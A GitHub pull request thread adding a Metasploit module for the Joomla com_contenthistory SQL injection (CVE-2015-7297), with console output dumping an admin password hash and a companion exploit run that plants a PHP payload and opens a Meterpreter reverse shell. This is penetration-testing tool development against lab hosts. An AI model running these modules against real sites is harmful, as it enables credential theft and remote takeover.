### PR TITLE
Add initial joomla_contenthistory_sqli module (CVE-2015-7297)

### PR DESCRIPTION
**Pull request by brandonprry**
This is a WIP for the recent Joomla com_contenthistory unauthenticated SQL injection.

```
msf auxiliary(joomla_contenthistory_sqli) > show options

Module options (auxiliary/gather/joomla_contenthistory_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ACTION     HASHES           yes       Enumerate session IDs [SESSIONS] or password hashes [HASHES]
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.31.16.13     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The relative URI of the Joomla instance
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_contenthistory_sqli) > run
"[{\"activation\":\"0\",\"block\":\"0\",\"email\":\"jfdsl@jfdslaf.com\",\"id\":\"378\",\"lastResetTime\":\"0000-00-00 00:00:00\",\"lastvisitDate\":\"2015-10-22 19:55:32\",\"name\":\"Super User\",\"otep\":\"\",\"otpKey\":\"\",\"params\":\"\",\"password\":\"$2y$10$iSdctySg.NSgPh0B4dW6PeinOj/9QvNS5VIzElhvcqsGrDVtCicia\",\"registerDate\":\"2015-10-22 16:39:53\",\"requireReset\":\"0\",\"resetCount\":\"0\",\"sendEmail\":\"1\",\"username\":\"admin\"}]"
[*] Auxiliary module execution completed
msf auxiliary(joomla_contenthistory_sqli) > 

```

### CODE REVIEW

**Comment by brandonprry** [comment]
```
msf > use auxiliary/gather/joomla_contenthistory_sqli 
msf auxiliary(joomla_contenthistory_sqli) > set RHOST 172.31.16.13
RHOST => 172.31.16.13
msf auxiliary(joomla_contenthistory_sqli) > set VERBOSE true
VERBOSE => true
msf auxiliary(joomla_contenthistory_sqli) > check
[+] 172.31.16.13:80 - The target is vulnerable.
msf auxiliary(joomla_contenthistory_sqli) > run

[*] Found database: joomla
[*] Found table: crkpy_users
[+] Users saved to file: /home/bperry/.msf4/loot/20151023073341_default_172.31.16.13_joomla.file_986721.txt
[*] Auxiliary module execution completed
msf auxiliary(joomla_contenthistory_sqli) > 
```

**Comment by brandonprry** [comment]
FWIW I removed getting the sessions for now, only pulls users data.

**Comment by wvu-r7** [comment]
Cool, will handle today, @brandonprry.

**Comment by wchen-r7** [comment]
@wvu-r7 Would you be interested in handling #6129 as well? It's for the same vulnerability, but that one is an exploit and this one is an auxiliary module.

**Comment by wvu-r7** [comment]
@wchen-r7: Sure.

**Comment by all3g** [comment]
Is it ok for everybody in **Joomla! 3.4.4** (Windows 7, default Installation) ?  An exception here in my lab:  **Auxiliary failed: NoMethodError undefined method `-'**
```
msf auxiliary(joomla_contenthistory_sqli) > show options 

Module options (auxiliary/gather/joomla_contenthistory_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.102    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /joomla/         yes       The relative URI of the Joomla instance
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_contenthistory_sqli) > run

[-] Auxiliary failed: NoMethodError undefined method `-' for #<String:0x00000003ab0d80>
[-] Call stack:
[-]   /home/notfound/.msf4/modules/auxiliary/gather/joomla_contenthistory_sqli.rb:65:in `run'
[*] Auxiliary module execution completed
```

----

[#6129](https://github.com/rapid7/metasploit-framework/pull/6129) goes well.

```
msf exploit(joomla_contenthistory_sqli_rce) > show options 

Module options (exploit/unix/webapp/joomla_contenthistory_sqli_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.102    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /joomla/         yes       The base path to Joomla
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.108    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Joomla 3.x <= 3.4.4


msf exploit(joomla_contenthistory_sqli_rce) > run

[*] Started reverse handler on 192.168.1.108:4444 
[*] 192.168.1.102:80 - Retrieved table prefix [ joomla ]
[*] 192.168.1.102:80 - Retrieved admin cookie [ 9kqq87cb8r9f9egl7fpm54g7n4 ]
[*] 192.168.1.102:80 - Retrieved unauthenticated cookie [ fbb517fc4588cec27bbbae07b7089225 ]
[*] 192.168.1.102:80 - Successfully authenticated as Administrator
[*] 192.168.1.102:80 - Creating file [ CNJkqtXg8pX7.php ]
[*] 192.168.1.102:80 - Following redirect to [ /joomla/administrator/index.php?option=com_templates&view=template&id=503&file=L0NOSmtxdFhnOHBYNy5waHA%3D ]
[*] 192.168.1.102:80 - Token [ 64e7b2a06a706c6e99a9b55f65940d9c ] retrieved
[*] 192.168.1.102:80 - Template path [ /templates/beez3/ ] retrieved
[*] 192.168.1.102:80 - Insert payload into file [ CNJkqtXg8pX7.php ]
[*] 192.168.1.102:80 - Payload data inserted into [ CNJkqtXg8pX7.php ]
[*] 192.168.1.102:80 - Executing payload
[*] Sending stage (33068 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.102:1639) at 2015-10-24 04:53:51 +0000
[+] Deleted CNJkqtXg8pX7.php
```

**Comment by brandonprry** [comment]
I won't be able to look at this until Sunday, but will then. It should Just Work*.

**Comment by all3g** [comment]
**Auxiliary failed: TypeError no implicit conversion of Fixnum into String**

```
msf auxiliary(joomla_contenthistory_sqli) > show options 

Module options (auxiliary/gather/joomla_contenthistory_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.102    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /joomla/         yes       The relative URI of the Joomla instance
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_contenthistory_sqli) > check 
[+] 192.168.1.102:80 - The target is vulnerable.

msf auxiliary(joomla_contenthistory_sqli) > run

[-] Auxiliary failed: TypeError no implicit conversion of Fixnum into String
[-] Call stack:
[-]   /opt/metasploit-framework/lib/msf/core/module/ui/message.rb:34:in `+'
[-]   /opt/metasploit-framework/lib/msf/core/module/ui/message.rb:34:in `print_status'
[-]   /home/notfound/.msf4/modules/auxiliary/gather/joomla_contenthistory_sqli.rb:65:in `run'
[*] Auxiliary module execution completed

```

**Comment by all3g** [comment]
Wordpress and joomla are in a database. When it dumps wp_user, it threads an exception.

**Comment by hexageek** [comment]
Re:all3g
Regarding to your undefined method bug

You have obsolete\old version of. Metasploit. Probably metasploit on old kali 1.1.0 or 1.0.9
On kali 2 working well..

**Comment by brandonprry** [comment]
Ah, this is good to know

**Comment by all3g** [comment]
@brandonprry  Please check the push , thanks.

**Comment by brandonprry** [comment]
If you have changes you want made to the module, make a PR against my branch in my fork, then everyone gets the right commit history, and your changes will show up in this PR when I merge them in.

**Comment by wvu-r7** [comment]
Okay, that looks better, @all3g.

**Comment by all3g** [comment]
Thanks. @brandonprry I've fixed notes.

**Comment by wvu-r7** [comment]
You guys are basically doing all the review for me. :3

**Comment by brandonprry** [comment]
Thanks for the updates @all3g 

Works well for me.

**Comment by brandonprry** [comment]
@wvu-r7 I think this is ready for your blessing!

**Comment by brandonprry** [comment]
Actually, I wasn't sure how to perform this merge, as the PR wasn't from a metasploit fork with the module, just a random repo.

I clicked the big green button to merge, but I think that has caused the commit from @all3g to disappear.

@wvu-r7 I am not sure how to proceed.

**Comment by brandonprry** [comment]
Ah, no I see what happened. Fixing.

**Comment by wvu-r7** [comment]
Looking good! You guys just saved me a lot of time...

**Comment by all3g** [comment]
Hi, all!  Could you help me to finish [#edb-28445](https://www.exploit-db.com/exploits/38445/). It sames like #6125. How to exploit it with msf module ?  We need to a request to fonts.googleapis.com for 500 error page. My question is [here](http://pastebin.com/dMAXHUyZ).

**Comment by wvu-r7** [comment]
@all3g: Are you Nixawk?

File: modules/auxiliary/gather/joomla_contenthistory_sqli.rb [hunk 1]
```diff
@@ -0,0 +1,207 @@
...
+        end
+      end
+      cols << record
+      vprint_status(record.to_s)
+    end
+    cols
+  end
+
+  def run
+    $lmark = Rex::Text.rand_text_alpha(5)
```
Comment (wvu-r7) [inline modules/auxiliary/gather/joomla_contenthistory_sqli.rb]: Please use instance variables instead of globals.

**Comment by brandonprry** [comment]
Sorry about that, fixed.

**Comment by wvu-r7** [comment]
@brandonprry: Not your fault. It's @all3g's. :P

**Comment by brandonprry** [comment]
I merged it into my code!

**Comment by brandonprry** [comment]
I wonder if that could be an msftidy rule

**Comment by wvu-r7** [comment]
For a second, I thought we had reverted to Perl.

**Comment by all3g** [comment]
@wvu-r7 all3g == Nixawk.  Is that a way for [the question](http://pastebin.com/dMAXHUyZ) ?

**Comment by wvu-r7** [comment]
@all3g: Nah, just making the connection between IRC and GitHub!

**Comment by all3g** [comment]
OK, Thanks.

**Comment by wvu-r7** [comment]
Beautiful work, gents. Code was pretty clean, and the module works nicely. :)

https://github.com/rapid7/metasploit-framework/commit/9041f95511d86257bb4ed11f6b82815041a6c571

**Comment by brandonprry** [comment]
Awesome, thanks a bunch dude :)

**Pull request merged**